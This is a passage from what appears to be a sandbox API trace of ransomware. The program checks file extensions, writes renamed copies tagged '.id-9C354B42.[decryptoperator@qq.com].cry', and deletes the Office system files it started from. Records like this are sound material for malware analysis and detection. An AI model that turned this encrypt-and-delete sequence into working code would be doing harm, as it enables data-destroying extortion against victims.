(lpString1=".ppt", lpString2=".DLL") returned 1 [0050.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.818] lstrlenW (lpString=".zip") returned 4 [0050.818] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0050.818] lstrlenW (lpString=".rar") returned 4 [0050.818] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0050.818] lstrlenW (lpString=".bz2") returned 4 [0050.818] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0050.818] lstrlenW (lpString=".7z") returned 3 [0050.818] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0050.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.818] lstrlenW (lpString=".dbf") returned 4 [0050.818] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0050.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.818] lstrlenW (lpString=".1cd") returned 4 [0050.818] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0050.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.818] lstrlenW (lpString=".jpg") returned 4 [0050.819] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0050.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.819] lstrlenW (lpString=".doc") returned 4 [0050.819] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0050.819] lstrlenW (lpString=".docx") returned 5 [0050.819] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0050.819] lstrlenW (lpString=".pdf") returned 4 [0050.819] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0050.819] lstrlenW (lpString=".xls") returned 4 [0050.819] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0050.819] lstrlenW (lpString=".xlsx") returned 5 [0050.819] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0050.819] lstrlenW (lpString=".ppt") returned 4 [0050.819] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0050.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.819] lstrlenW (lpString=".zip") returned 4 [0050.819] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0050.819] lstrlenW (lpString=".rar") returned 4 [0050.819] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0050.819] lstrlenW (lpString=".bz2") returned 4 [0050.820] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0050.820] lstrlenW (lpString=".7z") returned 3 [0050.820] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0050.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.820] lstrlenW (lpString=".dbf") returned 4 [0050.820] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0050.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.820] lstrlenW (lpString=".1cd") returned 4 [0050.820] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0050.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.820] lstrlenW (lpString=".jpg") returned 4 [0050.820] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0050.820] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0050.820] lstrlenW (lpString="DBGHELP.DLL") returned 11 [0050.820] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0050.835] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1369952) returned 1 [0050.835] CloseHandle (hObject=0x200) returned 1 [0050.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll")) returned 0x20 [0050.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0050.835] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.835] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0050.836] GetLastError () returned 0x0 [0050.836] ReadFile (in: hFile=0x200, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0050.902] WriteFile (in: hFile=0x194, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0050.940] ReadFile (in: hFile=0x200, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x4e770, lpOverlapped=0x0) returned 1 [0051.043] WriteFile (in: hFile=0x194, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x4e780, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x4e780, lpOverlapped=0x0) returned 1 [0051.051] ReadFile (in: hFile=0x200, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.051] WriteFile (in: hFile=0x194, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0051.051] SetEndOfFile (hFile=0x194) returned 1 [0051.052] CloseHandle (hObject=0x194) returned 1 [0051.052] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.052] SetEndOfFile (hFile=0x200) returned 1 [0051.055] CloseHandle (hObject=0x200) returned 1 [0051.055] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.055] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll")) returned 1 [0051.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.055] lstrlenW (lpString=".doc") returned 4 [0051.055] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.055] lstrlenW (lpString=".docx") returned 5 [0051.055] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0051.055] lstrlenW (lpString=".pdf") returned 4 [0051.055] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.055] lstrlenW (lpString=".xls") returned 4 [0051.055] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.055] lstrlenW (lpString=".xlsx") returned 5 [0051.055] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0051.055] lstrlenW (lpString=".ppt") returned 4 [0051.055] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.056] lstrlenW (lpString=".zip") returned 4 [0051.056] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.056] lstrlenW (lpString=".rar") returned 4 [0051.056] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.056] lstrlenW (lpString=".bz2") returned 4 [0051.056] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.056] lstrlenW (lpString=".7z") returned 3 [0051.056] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.056] lstrlenW (lpString=".dbf") returned 4 [0051.056] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.056] lstrlenW (lpString=".1cd") returned 4 [0051.056] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.056] lstrlenW (lpString=".jpg") returned 4 [0051.056] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.056] lstrlenW (lpString=".doc") returned 4 [0051.056] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.056] lstrlenW (lpString=".docx") returned 5 [0051.056] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0051.056] lstrlenW (lpString=".pdf") returned 4 [0051.056] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.056] lstrlenW (lpString=".xls") returned 4 [0051.056] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.056] lstrlenW (lpString=".xlsx") returned 5 [0051.056] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0051.056] lstrlenW (lpString=".ppt") returned 4 [0051.056] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.056] lstrlenW (lpString=".zip") returned 4 [0051.056] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.056] lstrlenW (lpString=".rar") returned 4 [0051.056] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.056] lstrlenW (lpString=".bz2") returned 4 [0051.057] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.057] lstrlenW (lpString=".7z") returned 3 [0051.057] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.057] lstrlenW (lpString=".dbf") returned 4 [0051.057] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.057] lstrlenW (lpString=".1cd") returned 4 [0051.057] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.057] lstrlenW (lpString=".jpg") returned 4 [0051.057] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.057] lstrcmpiW (lpString1=".EXE", lpString2=".cry") returned 1 [0051.057] lstrlenW (lpString="DW20.EXE") returned 8 [0051.057] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0051.080] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=994184) returned 1 [0051.080] CloseHandle (hObject=0x21c) returned 1 [0051.080] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe")) returned 0x20 [0051.080] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.080] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0051.081] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.081] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.113] GetLastError () returned 0x0 [0051.113] ReadFile (in: hFile=0x21c, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0xf2b88, lpOverlapped=0x0) returned 1 [0051.232] WriteFile (in: hFile=0x20c, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xf2b90, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xf2b90, lpOverlapped=0x0) returned 1 [0051.249] ReadFile (in: hFile=0x21c, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.249] WriteFile (in: hFile=0x20c, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0051.249] SetEndOfFile (hFile=0x20c) returned 1 [0051.249] CloseHandle (hObject=0x20c) returned 1 [0051.249] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.249] SetEndOfFile (hFile=0x21c) returned 1 [0051.410] CloseHandle (hObject=0x21c) returned 1 [0051.410] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.410] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe")) returned 1 [0051.411] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.411] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.411] lstrlenW (lpString=".doc") returned 4 [0051.411] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.411] lstrlenW (lpString=".docx") returned 5 [0051.411] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0051.411] lstrlenW (lpString=".pdf") returned 4 [0051.411] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.411] lstrlenW (lpString=".xls") returned 4 [0051.411] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.411] lstrlenW (lpString=".xlsx") returned 5 [0051.411] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0051.411] lstrlenW (lpString=".ppt") returned 4 [0051.411] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.411] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.411] lstrlenW (lpString=".zip") returned 4 [0051.411] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.411] lstrlenW (lpString=".rar") returned 4 [0051.411] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.411] lstrlenW (lpString=".bz2") returned 4 [0051.411] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.411] lstrlenW (lpString=".7z") returned 3 [0051.411] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.411] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.411] lstrlenW (lpString=".dbf") returned 4 [0051.411] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.411] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.411] lstrlenW (lpString=".1cd") returned 4 [0051.411] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.411] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.411] lstrlenW (lpString=".jpg") returned 4 [0051.411] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.412] lstrlenW (lpString=".doc") returned 4 [0051.412] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.412] lstrlenW (lpString=".docx") returned 5 [0051.412] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0051.412] lstrlenW (lpString=".pdf") returned 4 [0051.412] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.412] lstrlenW (lpString=".xls") returned 4 [0051.412] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.412] lstrlenW (lpString=".xlsx") returned 5 [0051.412] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0051.412] lstrlenW (lpString=".ppt") returned 4 [0051.412] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.412] lstrlenW (lpString=".zip") returned 4 [0051.412] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.412] lstrlenW (lpString=".rar") returned 4 [0051.412] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.412] lstrlenW (lpString=".bz2") returned 4 [0051.412] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.412] lstrlenW (lpString=".7z") returned 3 [0051.412] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.412] lstrlenW (lpString=".dbf") returned 4 [0051.412] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.412] lstrlenW (lpString=".1cd") returned 4 [0051.412] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.412] lstrlenW (lpString=".jpg") returned 4 [0051.412] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.412] lstrcmpiW (lpString1=".manifest", lpString2=".cry") returned 1 [0051.413] lstrlenW (lpString="eqnedt32.exe.manifest") returned 21 [0051.413] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0051.431] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=566) returned 1 [0051.431] CloseHandle (hObject=0x200) returned 1 [0051.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest")) returned 0x20 [0051.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.431] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0051.432] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.432] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0051.432] GetLastError () returned 0x0 [0051.432] ReadFile (in: hFile=0x200, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x236, lpOverlapped=0x0) returned 1 [0051.434] WriteFile (in: hFile=0x1f0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x240, lpOverlapped=0x0) returned 1 [0051.435] ReadFile (in: hFile=0x200, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.435] WriteFile (in: hFile=0x1f0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xfe, lpOverlapped=0x0) returned 1 [0051.435] SetEndOfFile (hFile=0x1f0) returned 1 [0051.435] CloseHandle (hObject=0x1f0) returned 1 [0051.435] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.436] SetEndOfFile (hFile=0x200) returned 1 [0051.436] CloseHandle (hObject=0x200) returned 1 [0051.436] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.437] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest")) returned 1 [0051.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.437] lstrlenW (lpString=".doc") returned 4 [0051.437] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0051.437] lstrlenW (lpString=".docx") returned 5 [0051.437] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0051.437] lstrlenW (lpString=".pdf") returned 4 [0051.437] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0051.437] lstrlenW (lpString=".xls") returned 4 [0051.437] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0051.437] lstrlenW (lpString=".xlsx") returned 5 [0051.437] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0051.437] lstrlenW (lpString=".ppt") returned 4 [0051.437] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0051.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.437] lstrlenW (lpString=".zip") returned 4 [0051.437] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0051.437] lstrlenW (lpString=".rar") returned 4 [0051.437] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0051.437] lstrlenW (lpString=".bz2") returned 4 [0051.437] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0051.437] lstrlenW (lpString=".7z") returned 3 [0051.438] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0051.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 